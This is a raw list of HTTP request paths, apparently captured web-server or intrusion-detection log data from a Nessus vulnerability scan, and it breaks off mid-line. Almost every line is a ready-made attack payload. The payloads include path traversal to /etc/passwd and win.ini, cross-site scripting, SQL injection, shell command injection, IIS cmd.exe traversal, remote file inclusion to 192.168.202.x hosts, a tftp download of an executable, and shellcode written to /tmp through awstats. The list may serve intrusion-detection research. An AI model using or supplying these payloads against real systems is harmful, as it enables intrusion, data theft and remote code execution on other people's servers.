#\n/scripts/admin/remotecontrol/lsrc.server.php?wsdl\n/examples/jsp/colors/texis.exe/nessus\n/adirss.exe/\n/path_script/createurl.php?formurl=http://192.168.202.118:8080/zz5thkvtmlgl?\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/caxpcjpwao.sh+>+/dev/null+&'); function v\n/cgi-bin/demos/demo.browse.php?filename=/etc/passwd\n/scriptpath/footers.php?tinybb_footers=http://cirt.net/rfiinc.txt?\n/phpmyadmin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/main.php?stuff=\"\\x0dsleep\\x099\\x09#\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../vtigerservice.php\\x00\n/examples/jsp/jsp2/el/wa.exe?debug-show-version\n/ca000007.pl?action=showcart&refpage=\\\"><script>alert('vulnerable')</script>\n/xlj7h65o.html?<script>document.cookie=\"testtbbe=856;\"</script>\n/recordings/htmlscript?../../../../../../../../../etc/passwd\n/javascript/sql.exe\n/58$$hoteldescription/\n/javascript/document.jsp\n/scripts/newsdesk.cgi?t=../../../../../../etc/passwd\n/sysuser/docmgr/ieedit.stm?url=../\n/examples/jsp/sessions/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/examples/jsp/sessions/index.php?search=<script>foo</script>\n/javascript/been.exe\n/renewsubscription/\n/top.php?stuff=\";sleep 9 #\n/pool_frame.php?poll_id=hyphy;system($_get[com]);&com=dir\n/en-us/manager/search/data/inputs/script/_new?action=edit\n/xfkun1ku.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/clientaccesspolicy.exe\n/javascript/medium.exe\n/examples/jsp/num/data/fetch.php?page='\n/recordings/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/examples/jsp/colors/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/zv8tv7h8.php?<script>document.cookie=\"testcqwz=9752;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/pcousamoyu;\"\n<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/manager/mapserv.exe?map=mapserver_detect.nasl.map\n/fa8p8lr8.cfc?<script>cross_site_scripting.nasl</script>\nftp://192.168.27.203/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/examples/jsp/colors/pfdispaly?../../../../../../etc/passwd\n/ao22ww7y.x?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/cgi/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/ipb5ri?\n/main.php?logout=';sleep\\x0910\\x09#\n/t7tm4m0b.asp?<script>cross_site_scripting.nasl</script>\n/scripts/lostpass.php\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/606wkcop.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../vtigerservice.php\\x00\n/scripts/zdbyw3dn3gh2.shtml\n/main.php?logout='&rm\\x09q59435268\\x09#\n/scripts/xuicksry9grj.asp\n/conscripted/\n/examples/jsp/checkbox/bb-hist.sh?histfile=../../../../../etc/passwd\n/examples/jsp/checkbox/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/phpmyadmin/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/help.php?q=\"rm\\xa0q74458178&rem\\xa0\n/zuihld5m.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/story.pl?next=../../../../../etc/passwd\\x00\n/top.php?stuff=\";sleep 8 #\n/6dlc2zm9.php?<script>document.cookie=\"testqpux=4016;\"</script>\n/examples/jsp/colors/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/examples/jsp/sessions/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/checkbox/main.php?g2_itemid=../../../../../license\\x00\n/jnt3f86c.dll?<script>document.cookie=\"testcmax=9270;\"</script>\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908817')</script>\n/examples/jsp/cal/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/cacti/forum_2.php?msg=10&return=<script>foo</script>\n/scripts/k0pxpjgnimox.php3\n/examples/servlets/servlet/index.cfm?fuseaction=category.display&category_id='\n/cacti/index.php?op=default&date=200607' union select 1,888296880,1,1,1,1,1,1,1,1--&blogid=1\n/cgi-915/htimage.exe/path/filename?2,2\n/cacti/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/javascript/m.exe\n/help.php?q=\"ver\\x09>q75241669&rem\\x09\n/n9xlumt5.php3?<script>cross_site_scripting.nasl</script>\n/javascript/edp.exe\n/examples/jsp/num/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/ovlaunch.exe\n/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=\";echo ''; echo `id `;die();echo\"\n/top.php?stuff=\";sleep\\x099\\x09#\n/en-us/h5sc3gxy.php?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=';del\\x09q97745414\\x09#\n/5o9zq43e.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/n1afe1y6.php?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"|ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/manager/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/index.php?cid='\n/examples/jsp/num/admin/admin.php?sid='\n/?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/examples/jsp/sessions/index.php?show=/etc/passwd\n/aj3pf49c.cfc?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/examples/jsp/error/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/ows-bin/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/en-us/account/lang/index.php?file=/etc/passwd\n/scripts/axdgpyi2bn6f.sh\n/ddoworrl.x?<script>document.cookie=\"testvlau=8517;\"</script>\n/6dlc2zm9.dll?<script>document.cookie=\"testqpux=4016;\"</script>\n/zln2hm2z.jsp?<script>document.cookie=\"testblcp=8120;\"</script>\n/phpmyadmin/.htpasswd\n/scripts/sc877q2pzqne.html\n/javascript/htpasswd.java\n/examples/servlets/servlet/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/g3w7y7u5.jspa?<script>document.cookie=\"testbfpq=3326;\"</script>\n/examples/jsp/cal/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+17ed+>>esbq\n/cacti/webplus?script=/../../../../etc/passwd\n/1r8cfrlf.do?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/it's huge! 3/\n/examples/jsp/cal/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/main.php?stuff=\"&ver\\x0c>q64367569&rem\\x0c\n/examples/jsp/error/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/main.php?stuff=\"&rm,q13326619&rem,\n/main.php?stuff='\\x0arm q85424597 #\n/javascript/viewvc.exe\n/cgi.cgi/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/recordings/texis.exe/nessus\n/g8nu2yy7.php?<script>cross_site_scripting.nasl</script>\n/scripts/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/gvx7m5ti.exe?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/nuh3zirz.dll?<script>cross_site_scripting.nasl</script>\n/esmozg5d.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&del q49814877&rem \n/?<script>document.cookie=\"testftxz=5980;\"</script>\n/edzaia0i.htm?<script>cross_site_scripting.nasl</script>\n/bookmark-script/\n/examples/jsp/num/index.php?search=<script>foo</script>\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,421684559,1012165790,1,1,1,1,1--&blogid=1\n/m5103snj.html?<script>cross_site_scripting.nasl</script>\n/<script>document.cookie=\"testlihk=7070;\"</script>\n/cgis/windmail.exe\n/mpcgi/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/en-us/esmozg5d.php?<script>cross_site_scripting.nasl</script>\n/managermultihtml.pl?multi=/etc/passwd\\x00html\n/6dlc2zm9.cgi?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/vmi8bb12.exe?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/javascript/linux.exe\n/examples/jsp/sessions/newsscript.pl?mode=admin\n/cgi-bin/fileseek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=\n/javascript/.passwd.php\n/examples/jsp/jsp2/jspx/pfdispaly.cgi?../../../../../../etc/passwd\n/search.jsp?q=%\"<script>alert(1331922090)</script>\n/ican'tfindajob/\n/l752x1ry.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testziyq=5055;\"</script>\n/javascript/calling.exe\n/jnv890lt.nsf?<script>cross_site_scripting.nasl</script>\n/mirc-scripts/\n/5o9zq43e.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/bbs.exe\n/help.php?q=\"uname\\x09>q46669995\\x09#\n/vhzmaia2.php?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/javascript/rb.exe\n/articler com rss script/\n/7o5qp766.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/home/search.asp?nchannel='1\n/rpc/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/llumt7msyau5y??\n/top.php?stuff=\"rm\\x09q19467518&rem\\x09\n/vjbrrppi.jsp?<script>cross_site_scripting.nasl</script>\n/33y9gcqq.php?<script>document.cookie=\"testnvxc=4301;\"</script>\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331908887,4--&blog=1\n/main.php?logout=&rm;q28829334&rem;\n/scripts/cdjnwtwnqga1.shtml\n/bn857frh.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/byrg33fw.php?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/examples/jsp/num/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/javascript/access_log.1.exe\n/examples/jsp/jsp2/jspx/core/api.php?t_path_core=/etc/passwd\\x00\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/iroy1gvqrrqu??\n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://192.168.202.118:8080/ghl9il?\n/examples/jsp/error/htgrep/file=index.html&hdr=/etc/passwd\n/d44uk9h2.jsp?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/examples/jsp/sessions/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/b4vng02k.do?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/recordings/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/javascript/san.exe\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/ghl9il?\\x00\n/scripts/axdgpyi2bn6f.pl\n/examples/jsp/jsp2/el/search.php?searchstring=<script>foo</script>\n/en-us/fo564rei.jspa?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q38648921&frm_user=&scr_height=&scr_width=\n/jujgxwav.nsf?<script>document.cookie=\"testknim=9383;\"</script>\n/examples/jsp/sessions/data/fetch.php?page='\n/cacti/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/a0imiuf1.kspx?<script>document.cookie=\"testxqrn=4654;\"</script>\n/windowsscripting/\n/main.php?stuff=&ver,>q86595211&rem,\n/main.php?stuff=\"&ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/samples/search.dll?query=<script>alert(document.cookie)</script>\n/javascript/phpnuke.exe\n/top.php?stuff='\\x0adel\\x09q26413975\\x09#\n/transcript_robertcharette050506/\n/jujgxwav.php?<script>document.cookie=\"testknim=9383;\"</script>\n/a0imiuf1.html?<script>document.cookie=\"testxqrn=4654;\"</script>\n/scripts/gtcatalog/index.php?function=custom&custom=http://xxxxxxxx/1\n/apavxugx.htm?<script>document.cookie=\"testdnbh=5237;\"</script>\n/manager/search.php?submit=true&search=');\n/scripts/admin/check_user.asp\n/javascript/storage.exe\n/manager/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/cgi-bin/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/3j8echh0.kspx?<script>document.cookie=\"testfuqi=4189;\"</script>\n/help.php?q=\"|sleep 7 #\n/examples/servlets/servlet/survey.inc.php?path=/etc/passwd\\x00\n/j2kdmfw4.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ywaxntrx.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/stat.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+52+50+33+d2+52+68+73+65+6e+64+8b+c4+52+68+72+65+63+76+8b+d4+52+51+50+51+ff++>>ctdn\n/scripts/index.php?id=yfbenmzg_m'\n/examples/jsp/checkbox/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/top.php?stuff=\"ping;-w;8000;-n;1;1.2.3.4&rem;\n/3m5knyc4.idc?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/x2gyorli.aspx?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/en-us/esmozg5d.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/minis.php?month=../../../../../../etc/passwd\n/main.php?stuff='&rm q97413885 #\n/main.php?stuff=ping;-w;8000;-n;1;4.3.2.1&rem;\n/download.php?sortby=&dcategory=<script>alert('vulnerable')</script>\n/3j8echh0.htm?<script>document.cookie=\"testfuqi=4189;\"</script>\n/scripts/www/delivery/ac.php?bannerid=-619+or+1=1\n/scs86g1p.html?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/subscriptions/\n/top.php?stuff=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/mirc-script/\n/xfkun1ku.php3?<script>cross_site_scripting.nasl</script>\n/zln2hm2z.htm?<script>document.cookie=\"testblcp=8120;\"</script>\n/iajtej82.php3?<script>cross_site_scripting.nasl</script>\n/d7ktpmcq.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/oyiiraofvl.sh;echo|awstats345478.txt\n/[xvid-ita]ocean's/\n/main.php?logout=\"del q68212743 #\n/82q7ywa8.x?<script>document.cookie=\"testpwew=1315;\"</script>\n/tuwjta1w.mscgi?<script>document.cookie=\"testpokn=7494;\"</script>\n/m4kkjf8l.pl?<script>document.cookie=\"testyglc=8988;\"</script>\n/examples/jsp/colors/directory.php?dir=;cat /etc/passwd\n/jnv890lt.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iv5vkgam.exe?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.tmp\n/main.php?stuff=|ping;-w;9000;-n;1;4.3.2.1|rem;\n/scripts/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\"\\x0asleep 8 #\n/cgis/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/phpmyadmin/topic.php?tid='select\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.x\n/n1afe1y6.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/napoleon's/\n/rv98iwjp.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/construction job description/\n/../../../../../../../../../../../winnt/win.ini\n/main.php?logout=\"|sleep\\x0910\\x09#\n..\\..\\..\\..\\..\\..\\windows\\win.ini\n/forum/hcspecific/enableforum.asp?action=enableforum&forumid='hosting_controller_forumid_sql_injection.nasl\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/llumt7msyau5y??\n/w4996nr0.aspx?<script>document.cookie=\"testttvs=7163;\"</script>\n/examples/jsp/sessions/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/vmi8bb12.do?<script>document.cookie=\"testlerc=2575;\"</script>\n/index.php?id=823dwrvmfh'\n/cgi-bin/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/help.php?q=\"&rm;q11575615&rem;\n/en-us/fo564rei.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"rm\\x09q68293964\\x09#\n/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/examples/jsp/errormultihtml.pl?multi=/etc/passwd\\x00html\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1743271420--\n/iktok2bw.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fnwhrxyd.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/help.php?q=;del\\x09q17568111\\x09#\n/w4996nr0.exe?<script>document.cookie=\"testttvs=7163;\"</script>\n/de3v2dd9.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.jsp\n/examples/servlets/servlet/index.php?page=/etc/passwd\\x00\n/1r8cfrlf.html?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/x2gyorli.html?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/en-us/dda2qr7j.kspx?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=1 '\" -- \n/y8pmygrp.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/screen.exe\n/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/main.php?stuff=\";uname\\x09>q87779896\\x09#\n/examples/jsp/checkbox/way-board/way-board.cgi?db=/etc/passwd\\x00\n/help.php?q='del q23433168 #\n/prescription-propecia/\n/examples/jsp/cal/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/examples/jsp/checkbox/more.php?id=1'\n/iisadmpwd/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/help.php?q=\"ping -w 11000 -n 1 1.2.3.4&rem \n/javascript/b2b.exe\n/main.php?logout=\"ping;-w;7000;-n;1;1.2.3.4&rem;\n/examples/jsp/jsp2/el/includes/config.php?relative_script_path=http://xxxxxxx\n/main.php?logout=\"&ping -w 7000 -n 1 4.3.2.1&rem \n/recordings/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/examples/jsp/error/shopaddtocart.asp?productid='42\n/j734qobz.cgi?<script>cross_site_scripting.nasl</script>\n/n9xlumt5.cfm?<script>cross_site_scripting.nasl</script>\n/zqqemp6j.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/index.php?id=0rop9yeuxw'\n/y8pmygrp.nsf?<script>cross_site_scripting.nasl</script>\n/manager/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/recordings/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/top.php?stuff=\"&del;q76531491&rem;\n/examples/jsp/checkbox/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/scripts/generate.cgi\n/main.php?frm_daynight=day&frm_passwd=q26533318&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=\n/0rufe52p.asp?<script>cross_site_scripting.nasl</script>\n/giftsubscriptionzip/\n/<script>alert('nessus:tomcat_3_2_2.nasl-1331904369')</script>.jsp\n/women's/\n/help.php?q=\"&sleep 10 #\n/prescriptives-coupons/\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/wrkvkjjzem0;echo|awstats939028.txt\n/o6ebbirj.php?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/index.php?id=0rop9yeuxw'\n/a0imiuf1.aspx?<script>document.cookie=\"testxqrn=4654;\"</script>\n/guestbook_script/\n/examples/jsp/colors/base_qry_common.php?base_path=/etc/passwd\\x00\n/scripts/zdbyw3dn3gh2.php\n/opensiteadmin/scripts/classes/form.php?path=@rfiurl\\x00\n/cgi-bin/ion-p.exe?page=../../../../../etc/passwd\n/examples/jsp/colors/index.php?op=default&date=200607' union select 1,1739511784,1,1,1,1,1,1,1,1--&blogid=1\n/scriptsmart/\n/byrg33fw.fts?<script>document.cookie=\"testexuu=5340;\"</script>\n/javascript/forrest.exe\n/8t9v8k7x.pl?<script>document.cookie=\"testhvje=9403;\"</script>\n/javascript/tar.bz2.exe\n/egaet53a.dll?<script>cross_site_scripting.nasl</script>\n/igtf0zon.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/iv5vkgam.cfc?<script>document.cookie=\"testfosd=94;\"</script>\n/sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>\n/main.php?logout=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/scripts/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/aj3pf49c.nsf?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/t-script_v4/\n/~nobody/etc/passwd\n/phpmyadmin/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/examples/jsp/error/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/i2n4v4rl.do?<script>cross_site_scripting.nasl</script>\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331919174')</script>\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331904204\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332009304')</script>\n/en-us/account/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/5qnlm5z2.cfm?<script>document.cookie=\"testsixi=8451;\"</script>\n/examples/jsp/num/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/javascript/week.exe\n/examples/jsp/error/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/cacti/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/l752x1ry.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=;rm q94314237 #\n/ddoworrl.cgi?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/iisadmpwd/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/top.php?stuff=\"&ver\\x0b>q72181135&rem\\x0b\n/javascript/password.exe\n/scripts/w04ukbv54ixz.inc\n/en-us/account/hw3.cgi?daysonly=0).system('id').(\n/en-us/account/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/qb2xy9aw.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ju0u7kfo.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/examples/jsp/cal/webplus.exe?script=webplus_install_path.nasl\n/examples/jsp/error/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=@rfiurl\n/en-us/account/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/3hlysl2x.php3?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/scripts/burfxmu.exe?/x+/c+tftp -i 192.168.202.96 get qex0enrb fcxfdorp.exe\n/top.php?stuff=';rm q38627655 #\n/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/phpmyadmin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/javascript/http.exe\n/examples/jsp/colors/core/api.php?t_path_core=/etc/passwd\\x00\n/examples/jsp/colors/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/passwdfile\n/scripts/index.php?op=default&date=200607' union select 1,684890398,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/cvslog.cgi?file=<script>window.alert</script>\n/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/examples/jsp/checkbox/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/esmozg5d.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331908729\n/javascript/data.exe\n/examples/jsp/jsp2/el/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/index.php?app=core&module=global&section=register&any=?section=../../../../../cache/installer_lock\n/fpnpp5zg.dll?<script>document.cookie=\"testyias=101;\"</script>\n/oie504mr.kspx?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/main.php?logout='\\x0dsleep 9 #\n/cacti/data/fetch.php?page='\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats217242.txt\n/examples/jsp/num/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/examples/jsp/sessions/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/j4drbkil.jspa?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\";rm\\x09q19299327\\x09#\n/examples/servlets/servlet/calendar.php?serverpath=/etc/passwd\\x00\n/ghswfouu.pl?<script>document.cookie=\"testsqmm=5713;\"</script>\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331919012,4--&blog=1\n/examples/jsp/error/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/help.php?q=\"&ver >q26584324&rem \n/full-scriptz/\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908886,1,1435248681--\n/cgi-bin/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/cgi-915/ion-p?page=../../../../../etc/passwd\n/main.php?logout=\";rm\\x09q14876269\\x09#\n/scripts/math_sum.mscgi\n/init.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/scripts/index.php?edit=nonexistant206733847\n/u95h6ymu.dll?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/en-us/9kr0ih0v.cgi?<script>document.cookie=\"testzgnm=1183;\"</script>\n/ydexw8by.jsp?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/main.php?logout=\"\\x0auname\\x09>q43175153\\x09#\n/javascript/compress.exe\n/javascript/manager.exe\n/main.php?logout=\"&ver\\x09>q15516267&rem\\x09\n/main.php?stuff=\"\\x0dsleep 7 #\n/y8pmygrp.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=uname\\x09>q22755994\\x09#\n/javascript/jmx-console.exe\n/?<script>document.cookie=\"testxagh=6987;\"</script>\n/scripts/ui/login?user=nessus-1331918852\n/yver8r9o.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/webnews.exe\n/bin/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/examples/jsp/checkbox/top.php?header=../../../../../../../../etc/passwd\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/javascript/json.exe\n/examples/servlets/servlet/directory.php?dir=;cat /etc/passwd\n/top.php?stuff=\"&rm\\x0bq72181135&rem\\x0b\n/help.php?q='del\\x09q77922174\\x09#\n/examples/servlets/servlet/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/en-us/w4996nr0.asp?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/sessions/index.php?id=urjhxcl19w'\n/subscriptions.java\n/jdx255ea.kspx?<meta http-equiv=set-cookie 